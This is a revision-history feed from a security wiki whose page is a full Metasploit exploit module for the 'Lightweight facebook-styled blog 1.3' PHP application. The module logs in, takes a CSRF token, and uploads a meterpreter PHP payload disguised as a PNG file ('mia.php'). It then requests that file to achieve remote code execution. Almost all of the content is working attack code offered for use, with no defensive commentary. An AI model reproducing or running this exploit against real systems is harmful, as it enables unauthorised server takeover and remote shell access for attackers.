https://pwnwiki.com/index.php?action=history&feed=atom&title=Lightweight_facebook-styled_blog_1.3_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E
Lightweight facebook-styled blog 1.3 遠程代碼執行漏洞 - Revision history
2026-04-16T21:18:36Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=Lightweight_facebook-styled_blog_1.3_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&diff=5949&oldid=prev
Pwnwiki: Created page with "<pre> ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::..."
2021-06-25T11:27:03Z
<p>Created page with "<pre> ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::..."</p>
<p><b>New page</b></p><div><pre><br />
##<br />
# This module requires Metasploit: https://metasploit.com/download<br />
# Current source: https://github.com/rapid7/metasploit-framework<br />
##<br />
<br />
class MetasploitModule < Msf::Exploit::Remote<br />
Rank = ExcellentRanking<br />
<br />
include Msf::Exploit::Remote::HttpClient<br />
<br />
def initialize(info={})<br />
super(update_info(info,<br />
'Name' => "Lightweight facebook-styled blog authenticated remote code execution",<br />
'Description' => %q{<br />
This module exploits the file upload vulnerability of Lightweight self-hosted facebook-styled PHP blog and allows remote code execution.<br />
},<br />
'License' => MSF_LICENSE,<br />
'Author' =><br />
[<br />
'Maide Ilkay Aydogdu <ilkay@prodaft.com>' # author & msf module<br />
],<br />
'References' =><br />
[<br />
['URL', 'https://prodaft.com']<br />
],<br />
'DefaultOptions' =><br />
{<br />
'SSL' => false,<br />
'WfsDelay' => 5,<br />
},<br />
'Platform' => ['php'],<br />
'Arch' => [ ARCH_PHP],<br />
'Targets' =><br />
[<br />
['PHP payload',<br />
{<br />
'Platform' => 'PHP',<br />
'Arch' => ARCH_PHP,<br />
'DefaultOptions' => {'PAYLOAD' => 'php/meterpreter/bind_tcp'}<br />
}<br />
]<br />
],<br />
'Privileged' => false,<br />
'DisclosureDate' => "Dec 19 2018",<br />
'DefaultTarget' => 0<br />
))<br />
<br />
register_options(<br />
[<br />
OptString.new('USERNAME', [true, 'Blog username', 'demo']),<br />
OptString.new('PASSWORD', [true, 'Blog password', 'demo']),<br />
OptString.new('TARGETURI', [true, 'The URI of the arkei gate', '/'])<br />
]<br />
)<br />
end<br />
<br />
<br />
<br />
def login<br />
<br />
res = send_request_cgi(<br />
'method' => 'GET',<br />
'uri' => normalize_uri(target_uri.path),<br />
)<br />
<br />
<br />
cookie = res.get_cookies<br />
token = res.body.split('":"')[1].split('"')[0]<br />
# token = res.to_s.scan(/"[abcdef0-9]{10}"}/)[0].to_s.tr('"}', '')<br />
print_status("Got CSRF token: #{token}")<br />
print_status('Logging into the blog...')<br />
res = send_request_cgi(<br />
'method' => 'POST',<br />
'uri' => normalize_uri(target_uri.path, 'ajax.php'),<br />
'headers' => {<br />
'Csrf-Token' => token,<br />
},<br />
'cookie' => cookie,<br />
'data' => "action=login&nick=#{datastore['USERNAME']}&pass=#{datastore['PASSWORD']}",<br />
)<br />
<br />
if res && res.code == 200<br />
print_good("Successfully logged in with #{datastore['USERNAME']}")<br />
json = res.get_json_document<br />
if json.empty? && json['error']<br />
print_error('Login failed!')<br />
return nil, nil<br />
end<br />
else<br />
print_error("Login failed! Status code #{res.code}")<br />
return nil, nil<br />
end<br />
<br />
return cookie, token<br />
end<br />
<br />
<br />
def exploit<br />
cookie, token = login<br />
unless cookie || token<br />
fail_with(Failure::UnexpectedReply, "#{peer} - Authentication Failed")<br />
end<br />
<br />
data = Rex::MIME::Message.new # jWPU1tZmoAZgooopowaNGjRq0KhBowaNGjRqEHYAALgBALdg7lyPAAAAAElFTkSuQmCC<br />
png = Base64.decode64('iVBORw0KGgoAAAANSUhEUgAAABgAAAAbCAIAAADpgdgBAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAAJElEQVQ4') # only the PNG header<br />
data.add_part(png+payload.encoded, 'image/png', 'binary', "form-data; name=\"file\"; filename=\"mia.php\"")<br />
print_status('Uploading shell...')<br />
res = send_request_cgi(<br />
'method' => 'POST',<br />
'uri' => normalize_uri(target_uri.path,'ajax.php'),<br />
'cookie' => cookie,<br />
'vars_get' => {<br />
'action' => 'upload_image'<br />
},<br />
'headers' => {<br />
'Csrf-Token' => token,<br />
},<br />
'ctype' => "multipart/form-data; boundary=#{data.bound}",<br />
'data' => data.to_s,<br />
)<br />
<br />
# print_status(res.to_s)<br />
if res && res.code == 200<br />
json = res.get_json_document<br />
if json.empty? || !json['path']<br />
fail_with(Failure::UnexpectedReply, 'Unexpected json response')<br />
end<br />
<br />
print_good("Shell uploaded as #{json['path']}")<br />
else<br />
print_error("Server responded with code #{res.code}")<br />
print_error("Failed to upload shell")<br />
return false<br />
end<br />
<br />
send_request_cgi({<br />
'method' => 'GET',<br />
'uri' => normalize_uri(target_uri.path, json['path'])}, 3<br />
)<br />
print_good("Payload successfully triggered !")<br />
end<br />
end<br />
</pre></div>
Pwnwiki